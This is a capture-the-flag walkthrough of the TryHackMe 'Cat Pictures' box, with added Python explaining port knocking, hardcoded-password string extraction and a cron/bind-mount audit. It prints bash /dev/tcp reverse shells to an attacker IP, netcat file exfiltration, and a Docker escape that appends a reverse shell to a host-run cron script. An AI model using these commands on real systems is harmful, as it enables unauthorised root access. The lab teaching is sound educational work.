
Cat Pictures (phpBB, Knockd, Docker)

First, enumerate the host with nmap (note that -A on its own scans only nmap's default top 1000 TCP ports).

╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures  
╰─➤  nmap -A 10.10.68.82 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-26 21:28 +0630
Nmap scan report for 10.10.68.82
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT     STATE    SERVICE    VERSION
22/tcp   open     ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
|   256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
|_  256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519)
8080/tcp filtered http-proxy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.12 seconds

Port 8080

Port 8080 serves a phpBB forum. One of the posts lists a sequence of port numbers, 1111 2222 3333 4444, which is the classic shape of a port-knocking sequence: knockd watches for connection attempts to closed ports in a set order and opens a firewall rule once it sees the full sequence from one source. Knock the sequence with the knock client and rescan with nmap.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures  
╰─➤  knock 10.10.68.82 1111 2222 3333 4444
╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures  
╰─➤  nmap 10.10.68.82                     
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-26 21:54 +0630
Nmap scan report for 10.10.68.82
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 36.74 seconds
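To make the mechanism concrete, here is an added example in Python (my code, not part of the original writeup and not knockd's own implementation): a client that sends the knocks the way the knock tool does, and a small server-side tracker that models what knockd checks, per-source progress through the sequence with a reset on a wrong port or a timeout. The source addresses, timestamps and the 5-second window in the sample log are constructed for the demonstration.

```python
import socket
from typing import Dict, List, Tuple

# Constructed: the knock sequence from the forum post above.
KNOCK_SEQUENCE = [1111, 2222, 3333, 4444]


def knock(host: str, ports: List[int], timeout: float = 0.5) -> None:
    """Client side: one TCP connection attempt per port, in order, like the
    knock tool. The ports are closed, so connect() fails; knockd sniffs the
    SYN with libpcap, so the failed attempt is all that is needed."""
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except OSError:
            pass  # refused or timed out: expected for a closed/filtered port
        finally:
            s.close()


class KnockTracker:
    """Server side: tracks each source's progress through the sequence.
    A hit on the wrong port resets that source; exceeding the window
    (assumed 5 s here) also resets. Completing the sequence returns True,
    which is where knockd would run its open command (for this box, the
    firewall rule that exposes port 21)."""

    def __init__(self, sequence: List[int], window: float = 5.0) -> None:
        self.sequence = sequence
        self.window = window
        self._state: Dict[str, Tuple[int, float]] = {}  # src -> (next index, last hit)

    def observe(self, src: str, port: int, ts: float) -> bool:
        idx, last = self._state.get(src, (0, ts))
        if idx > 0 and ts - last > self.window:
            idx = 0                      # too slow: start over
        if port == self.sequence[idx]:
            idx += 1                     # expected port, advance
        elif port == self.sequence[0]:
            idx = 1                      # wrong port, but a fresh attempt begins
        else:
            idx = 0                      # wrong port: reset (a scanner lands here)
        if idx == len(self.sequence):
            self._state.pop(src, None)   # success: forget the state, open the door
            return True
        self._state[src] = (idx, ts)
        return False


def replay(tracker: KnockTracker, events: List[Tuple[str, int, float]]) -> List[str]:
    """Feed (src, port, timestamp) connection attempts; return the sources
    that completed the sequence, in order."""
    return [src for src, port, ts in events if tracker.observe(src, port, ts)]


# Constructed SYN log: 10.9.0.82 knocks correctly, 10.9.0.99 is a port
# scanner that hits the same ports in the wrong order, 10.9.0.7 pauses
# too long between knocks 2 and 3.
SAMPLE_EVENTS = [
    ("10.9.0.82", 1111, 0.0), ("10.9.0.82", 2222, 0.2),
    ("10.9.0.82", 3333, 0.4), ("10.9.0.82", 4444, 0.6),
    ("10.9.0.99", 4444, 1.0), ("10.9.0.99", 3333, 1.1),
    ("10.9.0.99", 2222, 1.2), ("10.9.0.99", 1111, 1.3),
    ("10.9.0.7", 1111, 2.0), ("10.9.0.7", 2222, 2.5),
    ("10.9.0.7", 3333, 9.0), ("10.9.0.7", 4444, 9.1),
]

if __name__ == "__main__":
    # Against the real box this would be: knock("10.10.68.82", KNOCK_SEQUENCE)
    print(replay(KnockTracker(KNOCK_SEQUENCE), SAMPLE_EVENTS))  # ['10.9.0.82']
```

The scanner case is the point of the design: a full port scan touches all four ports, but not in order, so it never opens the door, while a knock sequence is still nothing more than an obscurity layer in front of whatever listens on port 21.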

Port 21

Port 21 is now open. Connect with FTP; anonymous login is allowed.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures  
╰─➤  ftp 10.10.68.82
Connected to 10.10.68.82.
220 (vsFTPd 3.0.3)
Name (10.10.68.82:hnl): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           162 Apr 02  2021 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (162 bytes).
226 Transfer complete.
162 bytes received in 0.02 secs (8.4402 kB/s)
ftp> 

Read the note.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures  
╰─➤  cat note.txt 
In case I forget my password, I'm leaving a pointer to the internal shell service on the server.

Connect to port 4420, the password is sardinethecat.
- catlover

Port 4420

Connect to port 4420 with netcat and enter the password sardinethecat.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures  
╰─➤  nc 10.10.68.82 4420
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
sardinethecat
Password accepted
ls -al
total 56
drwxr-xr-x 10 1001 1001 4096 Apr  3  2021 .
drwxr-xr-x 10 1001 1001 4096 Apr  3  2021 ..
-rw-------  1 1001 1001   50 Apr  1  2021 .bash_history
-rw-r--r--  1 1001 1001  220 Apr  1  2021 .bash_logout
-rw-r--r--  1 1001 1001 3771 Apr  1  2021 .bashrc
-rw-r--r--  1 1001 1001  807 Apr  1  2021 .profile
drwxrwxr-x  2 1001 1001 4096 Apr  2  2021 bin
drwxr-xr-x  2    0    0 4096 Apr  1  2021 etc
drwxr-xr-x  3    0    0 4096 Apr  2  2021 home
drwxr-xr-x  3    0    0 4096 Apr  2  2021 lib
drwxr-xr-x  2    0    0 4096 Apr  1  2021 lib64
drwxr-xr-x  2    0    0 4096 Apr  2  2021 opt
drwxr-xr-x  2    0    0 4096 Apr  3  2021 tmp
drwxr-xr-x  4    0    0 4096 Apr  2  2021 usr
cat .bash_history
mkdir bin
exit
cp /bin/bash bin/
ls -alt bin
exit

The service runs whatever command you type, but with no job control and the cd and ctrl-c limitations it warns about. For a more usable shell, start a listener on the attacking host (nc -lvnp 9001) and launch a bash reverse shell from the service:

/bin/bash -c '/bin/bash -i >& /dev/tcp/10.9.0.82/9001 0>&1'

The new shell's prompt reads "I have no name!", meaning its UID has no entry in the /etc/passwd it can see; together with the bin, etc, lib and usr directories in the listing above, this looks like a chroot jail built around the service. In /home/catlover there is a binary called runme. Pull it back to the attacking machine over a second netcat channel (start the listener first, then send from the box):

# Local
nc -l 9899 > runme

# Remote
nc -w 3 10.9.0.82 9899 < runme

Running strings on runme shows a plausible hardcoded password, rebecca. Running the binary and supplying it confirms the guess.
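As an added example (my code, not the room's runme and not the author's analysis), here is what that string analysis amounts to, in Python: a minimal strings that reports offsets like strings -t x, plus a heuristic that picks out single-token strings sitting next to a prompt that mentions a password. The byte blob is a constructed stand-in for the binary; only the prompt and banner text are taken from the output of the real program.

```python
import re
from typing import List, Tuple

# Constructed stand-in for runme: an ELF-looking header, the prompt and banner
# text seen when the binary runs, the hardcoded password next to them, a few
# instruction bytes and a string too short to report. Not the real file.
FAKE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
    + b"\x02\x00\x3e\x00\x01\x00\x00\x00"
    + b"Please enter yout password: \x00"
    + b"rebecca\x00"
    + b"Welcome, catlover! SSH key transfer queued!\x00"
    + b"\x48\x89\xe5\x48\x83\xec\x10"
    + b"/tmp/gibmethesshkey\x00"
    + b"ab\x00"
)


def extract_strings(data: bytes, min_len: int = 4) -> List[Tuple[int, str]]:
    """Minimal `strings -t x`: (offset, text) for every run of at least
    min_len printable ASCII bytes (0x20..0x7e and tab)."""
    pattern = rb"[\x20-\x7e\t]{%d,}" % min_len
    return [(m.start(), m.group().decode("ascii")) for m in re.finditer(pattern, data)]


def password_candidates(strings: List[Tuple[int, str]]) -> List[str]:
    """Heuristic only: a single-token string sitting right next to a string
    that mentions 'password' is where a hardcoded credential usually lands
    in .rodata. A human (or running the binary) still has to confirm it."""
    texts = [s for _, s in strings]
    found = []
    for i, s in enumerate(texts):
        neighbours = [texts[j] for j in (i - 1, i + 1) if 0 <= j < len(texts)]
        if not any("password" in n.lower() for n in neighbours):
            continue
        if " " not in s and "/" not in s and len(s) <= 32:
            found.append(s)
    return found


if __name__ == "__main__":
    for off, s in extract_strings(FAKE_BINARY):
        print(f"{off:6x}  {s}")
    print("candidates:", password_candidates(extract_strings(FAKE_BINARY)))
```

The offsets are what you carry into a disassembler to find the comparison that uses the string; a binary that compared against a hash rather than the plaintext would not fall to this, which is why the heuristic is only a starting point.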

I have no name!@cat-pictures:/home/catlover# ./runme
./runme
Please enter yout password: rebecca
Welcome, catlover! SSH key transfer queued! 
I have no name!@cat-pictures:/home/catlover# ls -al /tmp
ls -al /tmp
total 8
drwxr-xr-x  2    0    0 4096 Apr 26 15:58 .
drwxr-xr-x 10 1001 1001 4096 Apr  3  2021 ..
-rw-r--r--  1    0    0    0 Apr 26 15:58 gibmethesshkey

The gibmethesshkey file in /tmp is empty (0 bytes); it is a marker for something else on the box, and since both it and the key that follows are owned by UID 0, that something runs as root. Listing the current directory again a moment later, a private SSH key has appeared:

I have no name!@cat-pictures:/home/catlover# ls -al
ls -al
total 32
drwxr-xr-x 2 0 0  4096 Apr 26 15:59 .
drwxr-xr-x 3 0 0  4096 Apr  2  2021 ..
-rw-r--r-- 1 0 0  1675 Apr 26 15:59 id_rsa
-rwxr-xr-x 1 0 0 18856 Apr  3  2021 runme

Dump the key:

I have no name!@cat-pictures:/home/catlover# cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
[key material omitted]
-----END RSA PRIVATE KEY-----

Copy the key to the attacking machine, restrict its permissions (chmod 600 id_rsa, otherwise ssh refuses to use it) and log in as catlover:

╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures  
╰─➤  ssh -i id_rsa catlover@10.10.68.82
The authenticity of host '10.10.68.82 (10.10.68.82)' can't be established.
ECDSA key fingerprint is SHA256:7HBac/JH7EKQik9kL1l9GMjCgLN/69gfXalu5cbPi4U.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.68.82' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Apr 26 09:06:23 PDT 2022

  System load:  0.21               Users logged in:                0
  Usage of /:   37.2% of 19.56GB   IP address for eth0:            10.10.68.82
  Memory usage: 60%                IP address for br-98674f8f20f9: 172.18.0.1
  Swap usage:   0%                 IP address for docker0:         172.17.0.1
  Processes:    100


52 updates can be applied immediately.
25 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


Last login: Fri Jun  4 14:40:35 2021
root@7546fa2336d6:/# 

User && Root

The login lands in a root shell, but the hostname 7546fa2336d6 is a container ID rather than cat-pictures: the SSH login drops us into a Docker container. Read the flag it holds:

root@7546fa2336d6:/# cat /root/flag.txt
7cf90a0e7c5d25f1a827d3efe6fe4d0edd63cca9

We are inside a Docker container. The .bash_history in / is worth reading: whoever built the box was repeatedly editing /opt/clean/clean.sh and checking /etc/crontab.

root@7546fa2336d6:/# cat .bash_history
exit
exit
exit
exit
exit
exit
exit
ip a
ifconfig
apt install ifconfig
ip
exit
nano /opt/clean/clean.sh 
ping 192.168.4.20
apt install ping
apt update
apt install ping
apt install iptuils-ping
apt install iputils-ping
exit
ls
cat /opt/clean/clean.sh 
nano /opt/clean/clean.sh 
clear
cat /etc/crontab
ls -alt /
cat /post-init.sh 
cat /opt/clean/clean.sh 
bash -i >&/dev/tcp/192.168.4.20/4444 <&1
nano /opt/clean/clean.sh 
nano /opt/clean/clean.sh 
nano /opt/clean/clean.sh 
nano /opt/clean/clean.sh 
cat /var/log/dpkg.log 
nano /opt/clean/clean.sh 
nano /opt/clean/clean.sh 
exit
exit
exit

Check the mounts. The root filesystem is the container's overlay, but /opt/clean sits on the host's ext4 disk (/dev/xvda1) and is mounted into the container, so that directory is shared with the host:

root@7546fa2336d6:/# df -hT
Filesystem     Type     Size  Used Avail Use% Mounted on
overlay        overlay   20G  7.3G   12G  40% /
tmpfs          tmpfs     64M     0   64M   0% /dev
tmpfs          tmpfs    240M     0  240M   0% /sys/fs/cgroup
shm            tmpfs     64M     0   64M   0% /dev/shm
/dev/xvda1     ext4      20G  7.3G   12G  40% /opt/clean
tmpfs          tmpfs    240M     0  240M   0% /proc/acpi
tmpfs          tmpfs    240M     0  240M   0% /proc/scsi
tmpfs          tmpfs    240M     0  240M   0% /sys/firmware

So what is in /opt/clean?

root@7546fa2336d6:/# cd /opt/clean 
root@7546fa2336d6:/opt/clean# ls -al
total 16
drwxr-xr-x 2 root root 4096 May  1  2021 .
drwxrwxr-x 1 root root 4096 Mar 25  2021 ..
-rw-r--r-- 1 root root   27 May  1  2021 clean.sh
root@7546fa2336d6:/opt/clean# cat clean.sh 
#!/bin/bash

rm -rf /tmp/*

The script just empties /tmp, the sort of housekeeping job a cron entry runs. It is root-owned, but we are root inside the container and the file lives on a host-mounted path; if the host's cron runs it (the bash history suggests exactly that), anything appended here executes as root on the host. Start a second listener (nc -lvnp 9002) and append a reverse shell:

root@7546fa2336d6:/opt/clean# echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.9.0.82/9002 0>&1'" >> /opt/clean/clean.sh
root@7546fa2336d6:/opt/clean# cat clean.sh 
#!/bin/bash

rm -rf /tmp/*
/bin/bash -c '/bin/bash -i >& /dev/tcp/10.9.0.82/9002 0>&1'
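The same condition is easy to audit from the host side. Below is an added example, not part of the original writeup: a Python check that pairs the system crontab with the bind mounts reported by docker inspect and flags any job whose command references a path a container can write. The crontab text and the inspect JSON are constructed samples shaped like the real files; the /opt/clean mount and the clean.sh job mirror the box above, the other entries are ordinary and should not be flagged.

```python
import json
import shlex
from typing import Dict, List, Tuple

# Constructed sample of a host's /etc/crontab. The clean.sh entry mirrors the
# job abused above; the other lines are stock Ubuntu entries plus one
# ordinary script and should not be flagged.
CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/1 *   * * *   root    /bin/bash /opt/clean/clean.sh
0 3     * * *   backup  /usr/local/bin/backup.sh
"""

# Constructed, in the shape of `docker inspect <container>` (only the fields
# used here). The container ID and the /opt/clean bind mount are the ones
# seen on the box; the read-only localtime mount is a typical extra.
DOCKER_INSPECT = json.dumps([{
    "Id": "7546fa2336d6",
    "Mounts": [
        {"Type": "bind", "Source": "/opt/clean", "Destination": "/opt/clean", "RW": True},
        {"Type": "bind", "Source": "/etc/localtime", "Destination": "/etc/localtime", "RW": False},
    ],
}])


def parse_system_crontab(text: str) -> List[Tuple[str, str]]:
    """(user, command) for each job in a system crontab (/etc/crontab or
    /etc/cron.d/*, which carry a user field). Handles the five time fields
    and the @reboot/@daily shortcuts; skips comments and VAR=value lines."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first:
            continue
        shortcut = first.startswith("@")
        parts = line.split(None, 2) if shortcut else line.split(None, 6)
        if len(parts) == (3 if shortcut else 7):
            jobs.append((parts[-2], parts[-1]))
    return jobs


def paths_in_command(command: str) -> List[str]:
    """Absolute paths a cron command references: interpreter, script, or
    anything passed as an argument. Each is a file the job's user executes
    or reads, so each is a place a writer can plant something."""
    try:
        tokens = shlex.split(command)
    except ValueError:          # unbalanced quotes: fall back to whitespace split
        tokens = command.split()
    return [t for t in tokens if t.startswith("/") and len(t) > 1]


def container_writable_sources(inspect_json: str) -> List[Tuple[str, str]]:
    """(container id, host path) for every bind mount a container can write."""
    out = []
    for c in json.loads(inspect_json):
        for m in c.get("Mounts", []):
            if m.get("Type") == "bind" and m.get("RW"):
                out.append((c["Id"][:12], m["Source"].rstrip("/") or "/"))
    return out


def is_under(path: str, root: str) -> bool:
    return root == "/" or path == root or path.startswith(root + "/")


def risky_cron_jobs(crontab_text: str, inspect_json: str) -> List[Dict[str, str]]:
    """Jobs whose command touches a path some container can write to.
    Root inside the container can rewrite that file; host cron then runs
    the edited file as the job's user, which is exactly the escape above."""
    findings = []
    sources = container_writable_sources(inspect_json)
    for user, command in parse_system_crontab(crontab_text):
        for path in paths_in_command(command):
            for cid, src in sources:
                if is_under(path, src):
                    findings.append({"user": user, "path": path,
                                     "container": cid, "mount": src})
    return findings


if __name__ == "__main__":
    for f in risky_cron_jobs(CRONTAB, DOCKER_INSPECT):
        print(f"{f['user']} runs {f['path']}, writable from container "
              f"{f['container']} via bind mount {f['mount']}")
```

On a real host you would feed it the actual /etc/crontab plus /etc/cron.d/* and the output of docker inspect over every running container; the fix for a hit is either a read-only mount (":ro") or keeping the script itself outside the shared directory and only pointing it at the data.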

When the job next fires, the listener on port 9002 receives a shell. The hostname is now cat-pictures, so this is the host, not the container.

Read the root flag:

root@cat-pictures:~# cat /root/root.txt
cat /root/root.txt
Congrats!!!
Here is your flag:

4a98e43d78bab283938a06f38d2ca3a3c53f0476
